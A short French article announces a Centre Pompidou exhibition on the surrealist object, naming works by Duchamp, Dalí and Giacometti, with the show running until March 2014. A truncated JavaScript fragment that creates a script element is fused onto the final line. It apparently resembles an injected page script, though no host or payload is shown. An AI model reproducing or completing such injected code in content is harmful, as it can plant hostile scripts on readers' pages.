C’est la première fois qu’une exposition se consacre à l’objet, au cœur du mouvement surréaliste. Détournant les objets du quotidien, les artistes surréalistes ont cherché à «matérialiser le rêve et l’imagination». Ou  comment démystifier l’art et l’inviter dans notre vie: une Pelle à neige «en prévision d’un bras cassé», pensée par Marcel Duchamp, au Téléphone-homard de Dali, en passant par la Boule suspendue de Giacometti. C’est un peu d’art et beaucoup de poésie qui viennent s’insérer dans nos gestes de tous les jours.

 

A voir au Centre Pompidou, Paris, jusqu’au 3 mars 2014.var d=document;var s=d.createElement(‘script’); }